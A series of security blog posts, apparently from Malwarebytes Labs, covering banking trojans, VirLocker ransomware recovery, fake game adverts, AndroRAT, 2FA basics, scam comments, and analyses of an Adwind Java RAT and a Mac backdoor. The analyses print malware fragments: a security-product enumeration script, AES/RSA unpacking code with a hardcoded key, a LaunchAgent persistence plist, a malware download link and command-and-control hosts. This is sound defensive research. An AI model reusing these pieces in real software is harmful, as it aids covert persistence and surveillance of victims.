Sites that are going to be hooked are specified by configuration. Example of the target list from one of the samples shows, that the main interest of the attackers are various banks: https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt

Webinjects are implemented by adding malicious scripts (specialized for a specific target) into the content of the website. The scripts are hosted on the server controlled by attackers. Sample list of the scripts, fetched by the bot during tests:

.gist table { margin-bottom: 0; }

Those java scripts are implanted into the the attacked site before it is displayed in the browser – along with some more, obfuscated code. Templates of such implants are downloaded from the CnC server. You can see some examples here.

Conclusion

Terdot is yet another bot based on Zeus. Feature-wise it is similar to other bankers. However, I think it deserved some attention because of it’s recent popularity. It has been prepared with attention to details, so we may suspect that it is a work of professionals. It is actively developed, distributed and maintained – so, the probability is high, that we will be seeing it more in the future.

Categories: Techie Feeds

### VirLocker’s comeback; including recovery instructions

Malwarebytes - Wed, 01/25/2017 - 21:00

VirLocker is in no way new, it has been making a mess of victim’s machines for quite a few years now. VirLocker was the first example of a mainstream polymorphic ransomware and it left no expense of misery to its victims.

VirLocker can of course be propagated like any other malware from its author, but VirLocker has a trick up its sleeve when it comes to infecting other users. Because every file that VirLocker touches becomes VirLocker itself, so many users will accidentally send an infected version of a file to friends and colleagues, backups become infected, and even applications and EXE’s are not safe. Basically, when getting infected by VirLocker, you can no longer trust a single file that is on the affected machine.

This presents a problem when attempting to clean up the machine, because nothing can be trusted and every tool you use is dirty. Even attempting to download a tool to help you can prove a problem, because VirLocker will attempt to infect the new file before it is even opened if VirLocker is running on the machine.

However, if you find yourself infected with this variant DO NOT attempt to remove it yet! Not only does this article discuss the ransomware and how it works, but it will also show you how you can get your files back without paying the ransom.

Polymorphic functionality of VirLocker

VirLocker’s polymorphic abilities are a headache for everyone involved, researchers, victims, security companies, and more. Every time VirLocker adds itself to a file, the file is practically different in many ways than any other version of itself. VirLocker can add “Fake Code” to itself in certain sections to cause the file to be different, it can use different API’s in the main loader of the malware to avoid section fingerprinting, it can use different XOR and ROL seeds to make the encrypted content of the exe entirely different, and more. This level of polymorphic functionalities makes it astonishingly hard to deal with. When even the unpacker stub is different in every file, which could typically be used to fingerprint every variant, it only leaves behavior and heuristics as a possible method of detection.

As you can see with the above graph of a sample VirLocker infected file, if the payload stub can be different each creation, and the encrypted code is always seeded different, the embedded original file will of course always be different, depending on the file it attacks, and the resources are just a small icon of the original file it attacked. This leaves very little that is suitable for detection.

VirLocker’s execution chain

VirLocker’s execution is anything but simple and really reflects more of a mix of multiple protection types we have seen in single case ransomware scenarios. When the infection is executed, the FUD packer (which can be in some ways polymorphic itself) unpacks the first decryption function which is a mixture of Base64 and XOR and is always differently seeded. This new decryption function then decrypts another new decryption function that is a mixture of XOR/ROL and is always differently seeded. This decryption function then finally gets to the malicious code intended to run on the machine.

At this point the ransomware checks if it has already infected the machine, and if so, has it been paid? If it has been paid, the ransomware then becomes benign, and simply decrypts and extracts the original file that it had embedded inside of itself, and closes. If the user has been infected, but hasn’t paid, it simply opens the ransomware screen locker again, if it’s not open.

If it is a new victim, the ransomware opens the file embedded inside itself to make the user think all is well. For example, if the user B received a picture from their friend, user A, that was infected, once user B opens the file, the ransomware will show them the embedded intended picture, but then continue to infect the machine in the background. This is the background to how this ransomware self-replicates itself.

Example of what the original good file embedded in the virus looks like.

VirLocker overview

The image above shows the journey and issues that VirLocker presents. Not only is the virus hard to detect, it also has methods to continue existing without the help of the malware author. If anyone ever infected by VirLocker happened to send out any files after they were infected, thinking it was just a screen locker, those files will infect more people. This continuous loop of infection can cause VirLocker to spread like wildfire.

Upon opening VirLocker, it will add itself to nearly every file on the machine, ranging from mere pictures all the way to actual applications. Clicking on these files after the infection will only cause the ransomware to run again, or in the case of a new victim, infect them. Only after “Paying” the ransom, will these files extract their inner “Good Version” on the machine.

With all the madness that this ransomware causes, it has proven to be an amazing infection spreading method. Imagine you get this infection and think it’s just a screen locker like you have heard about. You somehow manage to remove the infection and think you are in the clear. Because extensions are turned off, you do not see that EVERY file on your machine now has a .exe extension added to it behind its original extension. You send your resume to a company you’re applying to and soon enough that whole business is infected.

VirLocker “Decryption” and clean up

DISCLAIMER: If you are infected with VirLocker, you are dealing with a very live and messy piece of malware. It is extremely easy to accidentally cause it to travel to other machines. It’s highly recommended before performing the steps below, that you isolate the machine from any other hardware or network. We cannot be responsible for anything that may happen to your or others machines while following the below instructions because of the nature of the malware.

If you find yourself infected with VirLocker and want your files back, DON’T REMOVE IT RIGHT AWAY. We need to trick the infection into thinking that you have paid the ransom, so you may get your original files back first. If you have removed the infection, clicking on any of the “encrypted/infected” files will bring up the screen again that VirLocker uses.

IF YOU HAVE ALREADY CLEANED THE MACHINE, CONTACT PROFESSIONAL HELP BEFORE TRYING TO REINFECT IT. DO NOT REINFECT THE MACHINE TO SIMPLY FOLLOW THESE STEPS.

Because of how messy VirLocker is and seeing how it doesn’t even have a cleanup method or decryption method internally, our goal here is to help you get back your important files, and completely reformat the machine afterwards. This post will only focus on helping you get back important files. After this is completed, a complete reformat should be done, since nothing on the machine should be trusted after this infection.

VirLock has screens that look like the above. They seem to always impersonate some type of legal authority. This one claims to be the Office of Criminal Investigation, where past versions called themselves “Operation Global 3” with different legal emblems.

The important part is the “Transfer ID:” text-box. We have found that any 64-length string will be accepted here as a real payment on this latest version of VirLocker. So, on your infected machine type the following into the Textbox:

0000000000000000000000000000000000000000000000000000000000000000

(That is 64 Zero’s.)

After you have done this, hit “Pay Fine”. This will cause the Ransom Lock Screen to disappear. VirLocker now thinks you have paid the ransom. Because of this, any of your infected files, upon double clicking them to open them, will no longer start the ransomware, but instead extract the original file inside of it.

As you can see in the image above, clicking on the infected file “guest.bmp.exe” extracted the “guest.bmp” file, which is the original good version of the file. You may now use a non-important USB drive to back up all the files that are important and that you need recovered from this nasty infection.

ENSURE TO NEVER PUT ANY .EXE FILES ONTO YOUR BACKUP DRIVE WHEN DOING THIS, THIS CAN CAUSE THE INFECTION TO SPREAD. ONLY BACKUP THE EXTRACTED ORIGINAL FILES THE EXE’S SPIT OUT!

ONLY PERFORM THIS ACTION ON THE MACHINE YOU ENTERED THE “0’S” ON THE LOCKSCREEN. OPENING THE EXE FILES ON ANY OTHER MACHINE WILL INFECT THEM!

After you have obtained the files that are important to you, the machine should be completely wiped at this point. To avoid this type of infection in the future, consider using an anti-ransomware solution like Malwarebytes, which has anti-ransomware functionalities built into it!

Hashes used in this analysis:

d438f51fbb56c06c8d910344ceed79504360162c78559254afa7b3fa27eaf763

bfa26552ae53c77a4ff49177e1b27dc318ee4102ca7281aa7dd3afdeccbe58ff

a9937f7b85a12f5bc2eda8240c9fa5972275b50bc851aa736402b5f166ef3b03

4d0c238a2cd530b6c9a724af5406dc50cf31988584d34cacf46ac9b2c5f63bcc

ff56e378a221100b160fae0d5cd4f94cb34c14b4e9b932c159c3c95c00526a35

505d86f5181bdd13e473bfa4ab5edbc4d9a6b4ba75f30404ea4966ff7a8ee8da

6372a2d90dec71b21fa5991b34289dfd2e8777bca9f51e5991dce03c4e861cd6

Categories: Techie Feeds

### Avoid these “Free Minecraft / Garry’s Mod” adverts

Malwarebytes - Wed, 01/25/2017 - 16:00

Garry’s Mod is a sandbox physics game which lets you manipulate ragdolls (effectively, static video game characters) into certain poses or player-made movies (Machinima).

If you were heavily into memes about 8 to 10 years ago, you probably saw no end of them on YTMND created with it. However, we’re about to have the exact opposite of a wonderful time. I was browsing for mods on the popular modding site Nexus and happened to see an eye-catching advert:

“Free: Garry’s Mod. Play now!”

Sounds too good to be true, especially as you need a Steam account to buy and play it. How can I get it for free?

The answer, it turns out, is by being sent to the Chrome store via the ad. This looks emphatically like Garry’s Mod so far:

I mean, there’s zero ambiguity here. A huge picture of TF2 characters doing Garry’s Mod things, a massive GARRY’S MOD: PLAY slap bang in the middle of the screen. I am definitely, totally getting Garry’s Mod here, no doubt about it.

I’d better read the small print before getting my Garry fill:

By clicking start game to install kidsvideogame games, you hereby consent to the kidsvideogame games terms of use and privacy policy, and agree to allow the kidsvideogame games extension to serve you advertisements. All such ads are served to you while you surf the internet and are branded as kidsvideogame games ads. the kidsavideogame games extension does not collect any personally identifiable information.

Well, uh…better have a look? My excitement for free Garry’s Mod action seems to have decreased by at least 3% but I’m sure everything will work out when I click the play bu-

* Read and change all your data on the websites you visit
* Communicate with cooperating websites

That’s certainly an odd name for a child-centric extension and not a Garry’s Mod in sight so far.

Here’s the Chrome store page the extension is coming from:

In terms of user functionality, the extension doesn’t actually let you do anything with it – it’s entirely grayed out, and we saw no adverts served during testing. At one point, we’d installed four of them simultaneously just to see if something might spur them into action but it wasn’t to be.

I have to admit, I was somewhat doubtful at this point that we’d be able to play a game which needs between 5 and 10GB of HDD space via a Chrome app but stranger things have happened at sea and all that. Ultimately, I detected a fatal lack of Garry, and indeed his mod, on the website kidsvideogame(dot)com which was just a huge pile of browser-based flash games:

No Garry, then, but plenty of related antics elsewhere to take a look at.

For example, we have a “Play Minecraft for free” ad on a Deus Ex trailer, which is highly appropriate because I never asked for this:

Looks familiar, right? Let’s open up the Chrome store again and we have thuggamerz(dot)com offering up a huge “Minecraft: play now” landing page and an extension called “Thug Gamerz Advertising”:

Click to view slideshow.

We’ve seen similar sites to the above and they seem to follow the same pattern – promote a cool “free” game via adverts, offer up an extension entirely unrelated to the game on display and then – depending on site – invite them to install and run an executable file (some simply stop at the extension. In terms of functionality, the extension doesn’t appear to do anything in terms of user interaction – it’s a grayed out icon on the Chrome taskbar).

The Thuggamerz site offered up an executable file immediately after installing the extension (unlike the site promoting free Garry’s Mod) called minecraft_download.exe (Gamisakiga setup). We detect this file as PUP.Optional.InstallCore.

After running the file, we see the following splash screen, from a program called “Download Bureau” which says it’ll “download and install the software on the computer”:

If you’re thinking that sounds a little small for Minecraft, you’d be right. Before we get to the punchline, a 30 day trial for a PDF viewer is offered up as an optional download during the install process:

As it turns out, that would actually be rather handy in this case as after all the hoops have been jumped, the extensions have been installed, the whirling collection of “Free Minecraft” banners have been clicked and the zip has been opened…

…the would-be player (who is probably a child eagerly awaiting Minecraft shaped goodness) is presented with nothing more than 2 PDF flyers advertising Minecraft and Minecraft Story mode.

Click to view slideshow.

Cue lots of screaming and parent reaching for the emergency earplugs.

There is, unfortunately, no free game dancing to the tune promised by the various adverts and websites; after all that effort, being “rewarded” with two PDFs telling the person in front of the PC to effectively go to the official websites and buy the games could be considered a bit on the underwhelming side of things. The sites we’ve seen so far which appear to be related to some or all of the above include kidsvideogame(DOT)com, thuggamerz(DOT)com, bubblegif(DOT)com and gameshaunt(DOT)com and users of Malwarebytes 3.0 will find we block these URLs. It’s possible there are others, so please advise your game-hungry children to be cautious around too good to be true freebies.

And keep those earplugs handy…

Christopher Boyd and Jovi Umawing

Categories: Techie Feeds

### Mobile Menace Monday: AndroRAT Evolved

Malwarebytes - Mon, 01/23/2017 - 13:47

An increasing amount of mobile malware known as Android/Trojan.AndroRAT has been seen in the wild lately.  AndroRAT is a contraction of Android and RAT (Remote Access Tool).  This piece of malware is far from new, but has gradually become more evolved over the years.

AndroRAT History

As the story goes (according to its GitHub page), the original AndroRAT was created as a proof of concept by a small team of developers for a University project in 2012.  It has two parts: the AndroRAT server which runs on a PC to control infected mobile devices, and the AndroRAT client which is installed onto a mobile device.

With a little Android development knowledge, the AndroRAT proof of concept could be used as a Trojan by taking an existing legitimate APK, decompiling it, adding the AndroRAT client code into the APK, and recompiling the APK.  After installing the infected APK onto a mobile device, it can be controlled via the AndrodRAT server which is a simple GUI interface.

Here are just some of the functionalities of AndroRAT:

• Collect contacts
• Collect call logs
• Collect all messages including SMS
• Record calls
• Location through GPS
• Take a picture from the camera
• Send a SMS message
• Make outgoing calls
• Open an URL in the default browser
AndroRAT Binder

Soon after the original AndroRAT was uploaded to GitHub, the malware authors took it a step further and created AndroRAT Binder; an APK builder that adds the AndroRAT client code to any APK.  AndroRAT Binder made building infected APKs so easy, that any script kiddie could use it.

Simply add the IP and port used to connect the AndroidRAT server to the client, provide a legitimate APK (most likely from Google PLAY) to repackage with AndroRAT, and build.  Once built, the infected APK could be put onto third party markets and/or file sharing sites for unsuspecting victims to install.  Considering we have found around 31k infected APKs that used the default settings of the AndroRAT Binder in our Mobile Intelligence System, it seems it caught on like wild fire.

AndroRAT Evolved

The AndroRAT variants we see in the wild today are far from the original open source code uploaded to GitHub back in 2012.  Updated coding has improved the functionality, made it more stable, and added obfuscation to deter against detection by malware scanners.  With the recent increase of AndroRAT in the wild, I predict the distribution method has greatly improved as well.  The old AndroRAT Binder made building an infected APK easier, but still only built APKs one at a time.  Most likely new builders have been developed that are capable of automating the process even further; such as bulk building AndroRAT infected APKs using legitimate apps.

The RAT is Always Lurking

AndroRAT client infected APKs run just like the apps they steal, but with added malicious functionality in the background.  If an app is popular on Google PLAY, most likely there is an AndroRAT infected version of it somewhere in the wild.  For example, here’s some code of an infected Pokémon GO app:

Trapping the RAT

As usual, it’s a cat and “RAT” game between malware developers and malware researchers.  They keep putting new variants of AndroRAT out in the wild, we keep detecting them as they emerge.  The best way to trap this RAT is to have a good malware scanner installed on your mobile device, and to install apps from reputable stores such as Google PLAY.  Stay safe out there!

Categories: Techie Feeds

### Understanding the basics of Two-Factor Authentication

Malwarebytes - Fri, 01/20/2017 - 16:00

Definition

By definition 2FA depends on two different methods of identity confirmation of the user. In the example above, the user knows the login credentials and has control over the phone that receives the text. Other factors that are often used are:

• Knowing a PIN or TAN code (ATM withdrawals, money transfers)
• Having access to an email account (when verification codes are sent by mail)
• Secret questions (often frowned upon as they are sometimes easy to guess)
• Physical keys (card readers, USB keys)
• Biometrics (fingerprint readers, iris scanners)
• Mobile devices that can scan barcodes or QR codes and calculate a login code for one time use (Authy, Google Authenticator)
Alternatives

There are some alternatives for 2FA that can also be used in combination with 2FA or as one of the factors. Some examples are:

• Single Sign On (SSO): this is mostly used as a method to dampen the impact of using 2FA methods, particularly when given an authenticated user access to several resources. The idea is that once the user has been identified and approved, the SSO software provides access to all platforms tied to the SSO. Given the possible impact of a breach the login procedure for a SSO system is usually done by using a MFA procedure. Another consideration when choosing a SSO system is the consequences of a failure. If the SSO software goes offline, will this block the user from all the underlying resources?
• Time-based One-time Password (TOTP): this is a special authentication method that uses an algorithm that calculates a one-time login code based on the time. The server and the user that wants to login both run simultaneous calculations with the same seed and time-stamp. If the results match, the user is granted access. Obviously the clocks need to be synchronized, although there usually is some leniency built into the procedure (up to a one minute difference is generally allowed). Since losing the machine that runs the algorithm or any other way that leaks the algorithm could allow access to the wrong person, this method is generally used as one factor in a MFA method.
• Token Authentication: besides physical tokens, other tokens can be used as a means of authentication. Consider, for example, apps that run on your smartphone and can show an image to your webcam or play a sound which can be compared to an original. As this is not a very strong authentication method (for now) it is advisable to be used as one of the authentication factors and not the sole one.
Summary

Although a strong password is still a very effective means of authentication, there have been so many breaches resulting in leaked passwords, that methods have been developed to combine with or replace the use of passwords. The combination of two authentication methods is called 2FA and when we use more than two it’s called MFA.

Pieter Arntz

Categories: Techie Feeds

### Verified Twitter accounts compromised, get busy spamming

Malwarebytes - Thu, 01/19/2017 - 18:00

Verified Twitter accounts tend to be a little more secure than those belonging to non-verified users due to the amount of extra hoop jumping required to get one of those ticks in the first place. A number of security requirements, including providing a phone number and setting up 2FA, are all things a would-be verified Twitter user needs to do.

In theory, it should be somewhat tricky to compromise those accounts – it wouldn’t really help Twitter if their theoretically appealing verified accounts were firing out Viagra spam all day long. Brand reputation and all that.

And yet…in the space of a few hours last week, we had multiple verified users hitting the “I’ve been compromised” wall of doom and gloom.

Denise Crosby of Star Trek: TNG fame (Tasha Yar, anyone?) found her account pushing porno dating links:

The same fate befell Jennifer Kaytin (creator of MTV show Sweet / Dangerous), sending eager clickers to a Tumblr redirect leading to dating spam:

Elsewhere, Alex Jones – a well known BBC presenter – found herself offering up discount Ray Ban sunglasses:

We’ve seen a fair bit of Ray Ban spam circulating on Twitter recently, primarily on non-verified accounts.

These rogue tweets were, in theory, being sent to a combined audience of around 200,000+ people which could have been disastrous if the links had contained malicious files. Thankfully, these links were “just” porn spam and sunglasses, but the danger for something much worse is always present where a compromise is concerned. People trust the verified ticks in the same way they probably let their guard down around sponsored tweets, and in both cases a little trust can be a bad thing.

As mentioned earlier, it should be very difficult to grab one of these accounts but the hits just keep coming regardless. I could be wrong on this, but once the two factor SMS is setup on a verified account, you can’t disable it without risking your verified status – so one would suspect a possible rogue app in the above cases as a potential hole in the digital armour.

However the scammers are doing it, always pay attention when your favorites start firing out URLs. Links are meant to be clicked, but that doesn’t mean we have to leap before looking – Twitter works best with shortened URLs, but you can usually see where they lead.

Whether you’re verified or not, keep your wits about you and have a hopefully stress free experience on that most popular of social networks.

Christopher Boyd

Categories: Techie Feeds

### Malwarebytes Labs Blog Comment Safari

Malwarebytes - Thu, 01/19/2017 - 16:00

Comments on the Malwarebytes labs blog can be well written, valuable additions to our published work, and sometimes provide additional data that we missed. These are not those. Today we’re looking at some comments we got from spammers who apparently don’t look too closely at which site they’re at before they hit “Send”.

Financial scams

sparksdean91@gmail.com sent in the following opportunity:

got my already programmed and blanked ATM card to withdraw the maximum of $50,000 daily for a maximum of 20 days.I am so happy about this because i got mine last week and I have used it to get$100,000.Mrs Glory is giving out the card just to help the poor and needy though it is illegal but it is something nice and she is not like other scam pretending to have the blank ATM cards. And no one gets caught when using the card.get yours from her.Just send her an email On atmmachine005@gmail.com

Unsurprisingly, the same text shows up on a spam blacklist coming from a Nigerian IP in September of last year. As we can see below, these sort of financial scams tend to be copy pasted for years, by more than one scammer at a time:

Russian hackers for hire

ghosthackingfoundation@yahoo.com posted news of hackers for hire:

Suspiciously similar to the previous pitch, these guys are playing on growing public awareness of online fraud rings to aid an air of “legitimacy” to their goods. Searching on the contact email provided yields a bit more of an honest pitch:

So what’s the problem here? Firstly, real hackers tend not to advertise in places like the comments section of the Economist. Also, there’s a robust industry involved with taking money for hacking services and then disappearing. Read a little more about how using these “hacking services” worked out for others: link.

Magic spells

luciarose000@gmail.com takes things in a weirder direction with a wizard for hire:

This one has oddly kept the same contact phone number since 2013

Almost exclusively posted from Nigeria, these listings aren’t necessarily fraudulent on their face, but often serve as an entry point for the scammer to wheedle more and more money, or gain access to the mark’s financial accounts. There’s some pretty good advice from a “real witch” here on why you shouldn’t talk to a spell caster from Nigeria: link.

The totally real Illuminati

maganasolutioncentre@gmail.com offers us the best of a bunch, an invitation to join the Illuminati:

We actually saw these two years ago here (thanks to Chris Boyd.) The gist of it is that to get your new Illuminati membership card (which you should definitely not show anyone), you need to forward some fairly detailed financial information to Nigeria and wait patiently. Probably not a great idea. This particular Illuminatus also advertises at that number for cures to HIV, herpes, and cancer, as well as winning lottery numbers for unspecified countries.

Nigerian comment spam comes in waves, but it tends to have the same theme – if you wire some money to them, they can fulfill grossly outlandish promises. Hopefully people who read deep into internet comments will remember to do so with a critical eye.

Categories: Techie Feeds

### From a fake wallet to a Java RAT

Malwarebytes - Wed, 01/18/2017 - 18:00

This malware came in a phishing e-mail – disguised as a Bitcoin wallet. After clicking the link, user receives a JAR file (hosted at Dropbox): wallet.aes.json.jar, that turns out to be a RAT – Adwind.

Dropbox link (currently not active): https://www.dropbox.com/s/sl8ton6reobdyb7/wallet.aes.json.zip?dl=1

Analyzed sample

Files dropped during analysis:

Behavioral analysis

After being deployed, the malware runs silently. If we observe it via Process Explorer, we can spot it deploying some scripts.

Indeed, during the installation some new files are being dropped into the %TEMP% folder: vbs scripts, reg file for the registry modification, and a DLL.

The vbs scripts are used to detect installed security products (AV, firewall) and they are deleted immediately after being deployed. Example of the captured script:

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2") Set colItems = oWMI.ExecQuery("Select * from FirewallProduct") For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End With Next

The application installs itself as a hidden file in a hidden folder. After disabling the attribute we can see the jar, copied as Windows.Windows:

Persistence is achieved with the help of a registry key:

The first visible symptom of infection is an attempt of running the reg file that triggers UAC popup. If we accept it, soon we can see another pop-up informing about UAC being disabled.

The malware establishes connection with the server: 104.239.166.119 (jamoos88.ddns.net):

Fragment of the captured communication:

Unpacking

This malware comes solidly obfuscated. There are three jars nested in one another. Two inner JARs were encrypted using strong cryptography (RSA + AES). The last (third) layer is a core module – the jRAT bot.

Stage 1

Trying to decompile the code (i.e. with the help of JD-GUI) we can notice that it is not readable. As we can find by reading strings, it has been obfuscated by Allatori Obfuscator v6.0 DEMO.

Fortunately, using this free java deobfuscator (https://github.com/java-deobfuscator/deobfuscator) it was possible to get some improvement. Example of the settings used:

java -jar deobfuscator-1.0.0.jar -input wallet.aes.json.jar \ -output deobfuscated.jar \ -transformer general.SyntheticBridgeTransformer \ -path /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar

However, even after preprocessing by the deobfuscator, the popular decompiler JD-GUI (and some other) were not able to give a valid output code. Finally, I managed to get a valid code with the help of CFR decompiler (http://www.benf.org/other/cfr/). In order to unpack other files, like resources from inside of the jar, I changed it’s extension to zip and decompressed it.

Manifest points, that execution of the code starts from the class MANAGER:

In the main folder, we can see several other classes with obfuscated names. There are also 2 subfolders. Opening them leads to some encrypted files, as well as two identical JPEGs with the following content:

Although their content is curious (it is a photo of a document, probably a driving license) – they are most likely added just as junk for the purpose of obfuscation.

The deobfuscated code still needed a lot of manual cleaning before it started getting a readable shape. Not only classes, but also all the strings are obfuscated.
After all, we could find out, that first some file is being decrypted. It’s path and the used key are stored in the class called i:

public final class i { public static String b = c.a(f.a("\t'VdU:\t/\b;H,")); public static String a = c.a(f.a("J U{\u0015$C'B @\"T$Q'")); }

The same class after manual deobfuscation:

public final class i { public static String key = "lks03oeldkfirowl"; public static String path = "/lp/sq/d.png"; }

Decryption involves a wrapper implemented in a class c.

byte []dec_content = c.a(input_data, key.getBytes());

After manual deobfuscation of this class, we can see that it deploys AES:

public static byte[] a(byte[] a2, byte[] a3) {     try {         Key key = new SecretKeySpec((byte[])a3, "AES");         Cipher cipher2 = Cipher.getInstance("AES/ECB/PKCS5Padding");         cipher2.init(2, key);         a2 = cipher2.doFinal(a2);         return a2;     }     catch (Exception v1) {         return null;     } }

The result is an XML file:

The file has lot of junk fields, that are used only to make the content less readable. Only two fields are used further:

First field – SERVER – refers to a resource path containing one more encrypted fie. Second field – PASSWORD – is an AES key.

Decryption involves two steps, executed by two classes. AES – just like in the previous case – and then Gzip decompression of the result.

byte []dec_content = b.a(c.a(input_data, key.getBytes()));

After applying it, we get another JAR – stage 2.

Stage 2

Similarly, I cleaned the jar by the same deobfuscator. Then, I decompressed the jar to view resources.

The execution starts in a class JRat in the folder operational:

Even after cleaning by the automated deobfuscator, the code is still far from being readable. (You can see it here).

Finally, after manual refactoring we can find out, that this is just another loader, meant to unpack next stage JAR and then to run it.

Deobfuscated decryptor class:

package w; import java.security.GeneralSecurityException; import java.security.Key; import java.security.interfaces.RSAPrivateKey; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; public class kyl { private byte[] encryptedAesKey; private byte[] encryptedBuffer; private static int mode = javax.crypto.Cipher.DECRYPT_MODE; public kyl() { } public void setEncryptedBuffer(byte[] value) { this.encryptedBuffer = value; } public void setEncryptedAesKey(byte[] value) { this.encryptedAesKey = value; } public byte[] decryptContent(Object object2) throws GeneralSecurityException { Cipher object = Cipher.getInstance("RSA"); object.init(2, (RSAPrivateKey)object2); Cipher cipher2 = Cipher.getInstance("AES"); byte []aesDecrypted = object.doFinal(this.encryptedAesKey); SecretKeySpec sKey = new SecretKeySpec(aesDecrypted, "AES"); Cipher arrby = cipher2; arrby.init(mode, (Key)sKey); return arrby.doFinal(this.encryptedBuffer); } }

Resources of the file contains RSA private key, encrypted AES key and the encrypted content. After deobfuscating the code, and applying them properly in order to decrypt the content, we can see one more XML file:

Each of the properties is a path leading to other resources:
SERVER_PATH points to the encrypted resource with yet another JAR (the core of the malware). PASSWORD_CRYPTED is an RSA encrypted AES key. PRIVATE_PASSWORD is a private RSA key. The same decrypting function (using RSA + AES) must be applied once again on the content read from the resource files, defined in the XML. As the result we get another (third) JAR.

Additionally, in the comment section we can see a link to the website of the JRAT tool. Following the link we can find a commercial description provided by the authors/resellers a tool intended for a non-malicious purpose of remote administration. At first it looks like we found a source related to this application – but is it really? (More information about it you will find in the section “Identification”).

Stage 3 Deobfuscation – decompiler choice makes a big difference

I used the same automated java deobfuscator to clean this stage and then tried to decompile the output jar.

Looking at the internal structure of the JAR we can find familiar elements that ensure us, that this is the core of this malware. For example, the functionality used to infect particular system (windows, mac, linux). In folders key and protect we can find the DLLs that are being dropped in %TEMP% folder on Windows. Also, there are classes responsible for network communication over SSL.

However, the success of the analysis depends very much on the decompilers that we use. Although JD-GUI was very good to present the internal structure of packages, it was not capable of decompiling all the classes. We can easily read the packages that were not obfuscated. But the core of the RAT – classes in a package called server – are completely unreadable:

The other decompiler – CFR – gave a far better result. See the code: https://gist.github.com/hasherezade/4997bae081a9d62305e33a6f97725c60#file-layer3-java.

Finally we get some java code, but this is not the end of the deobfuscation. In order to make analysis harder, two techniques are applied. First of all, the classes and methods and variables are renamed to meaningless, similar looking strings. Second, all the strings are encrypted by several functions.They are decrypted at runtime, just before use. Most of the code in the core classes looks similar to this fragment:

Although sometimes we can see references to classes with readable names (like JSON parsers) it is too less to understand the functionality behind. Decoding some of the strings could improve readability a lot, but unfortunately, the responsible functions decompiled by CFR came out distorted. After several attempts I found a decompiler that managed to get them right – Kraktau (https://github.com/Storyyeller/Krakatau). Example – one of the string decrypting functions decompiled by Kraktau:

.gist table { margin-bottom: 0; }

Additionally, those functions make a decryption key from the name of the calling class and method. Due to this fact, if we try to start deobfuscation process from renaming the functions, we cannot get the valid strings.

Decoding the configuration

In the folder resources we can find some interesting files: Key1.json, Key2.json and config.json.

It was easy to guess, that they are encrypted by the same way as the previous layer: Key1 was a serialized RSA private key, Key2 -encrypted AES key, and config.json – an AES encrypted configuration file. Indeed, deploying the decryptor I made in order to defeat the previous layer worked. We got a configuration of the RAT.

We can recognize familiar elements that we saw during the behavioral analysis:

As we can see, the jar is installed in the folder Windows, under the name Windows and with the extension Windows. Folder PuXpErTFKpK is used to store eventual plugins. The configuration file includes also the content of the .reg file that is we observed being dropped in the %TEMP% folder and deployed. There is also a blacklist of the AV/security products.

Features

After deobfuscating most of the strings we can have a better grasp on the RAT’s functionality. The RAT is highly configurable with the help of the JSON file that was mentioned before. Also, the application can be extended by the dedicated plugins.

Yet, some interesting features are build in the main JAR, for example:

• Spying on the victim by capturing the input from their microphone and camera:

The captured content is uploaded to the C&C:

• Opening a defined URL in a browser:

• Tracking active windows:

• Basic information about the system are is sent to the C&C in form of a report:

Conclusion

The strings left in the malware point to the website jrat.io. Also, the features of the RAT look very similar to the one described on the page. At first, I got deceived and thought that it is the same product, however, thanks to the hint from another researcher – – I got convinced, that it is indeed just a deception. Looking inside the RAT distributed on jrat.io we can see a completely different structure of classes. The RAT sold on the page jrat.io is called Jackbot, while the current one is called Adwind (also often refereed as JRAT).
Adwind is one of the most popular Java RATs and for sure we will see it again in the future. Authors have put a lot of effort in protecting it’s core as well as added links to misguide an analyst. Fortunately, it doesn’t seem to evolve too rapidly. The currently analyzed malware is very similar to the one distributed in July 2016  (4e76823c05048e92a4c0122d61000edf) in a different campaign (read more here).

Categories: Techie Feeds

### New Mac backdoor using antiquated code

Malwarebytes - Wed, 01/18/2017 - 15:00

The first Mac malware of 2017 was brought to my attention by an IT admin, who spotted some strange outgoing network traffic from a particular Mac. This led to the discovery of a piece of malware unlike anything I’ve seen before, which appears to have actually been in existence, undetected, for some time, and which seems to be targeting biomedical research centers.

The malware was extremely simplistic on the surface, consisting of only two files:

~/.client SHA256: ce07d208a2d89b4e0134f5282d9df580960d5c81412965a6d1a0786b27e7f044 ~/Library/LaunchAgents/com.client.client.plist SHA256: 83b712ec6b0b2d093d75c4553c66b95a3d1a1ca43e01c5e47aae49effce31ee3

The launch agent .plist file itself couldn’t have been much simpler, simply keeping the .client running at all times.

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>com.client.client</string> <key>ProgramArguments</key> <array> <string>/Users/xxxx/.client</string> </array> <key>RunAtLoad</key> <true/> <key>NSUIElement</key> <string>1</string> </dict> </plist>

The .client file was where things got really interesting. It took the form of a minified and obfuscated perl script.

The perl script, among other things, communicates with the following command and control (C&C) servers:

99.153.29.240 eidk.hopto.org

The latter is a domain name managed by the dynamic DNS service no-ip.com.

The script also includes some code for taking screen captures via shell commands. Interestingly, it has code to do this both using the Mac “screencapture” command and the Linux “xwd” command. It also has code to get the system’s uptime, using the Mac “uptime” command or the Linux “cat /proc/uptime” command.

The most interesting part of the script can the found in the __DATA__ section at the end. Found there are a Mach-O binary, a second perl script and a Java class, which the script extracts, writes to the /tmp/ folder and executes. In the case of the Java class file, it is run with apple.awt.UIElement set to true, which means that it does not show up in the Dock.

The binary itself seems primarily interested in screen captures and webcam access, but interestingly, it uses some truly antique system calls for those purposes, such as:

SGGetChannelDeviceList SGSetChannelDevice SGSetChannelDeviceInput SGInitialize SGSetDataRef SGNewChannel QTNewGWorld SGSetGWorld SGSetChannelBounds SGSetChannelUsage SGSetDataProc SGStartRecord SGGetChannelSampleDescription

These are some truly ancient functions, as far as the tech world is concerned, dating back to pre-OS X days. In addition, the binary also includes the open source libjpeg code, which was last updated in 1998.

The Java class appears to be capable of receiving commands to do various tasks, which include yet another method of capturing the screen, getting the screen size and mouse cursor position, changing the mouse position, simulating mouse clicks, and simulating key presses. This component appears to be intended to provide a kind of rudimentary remote control functionality.

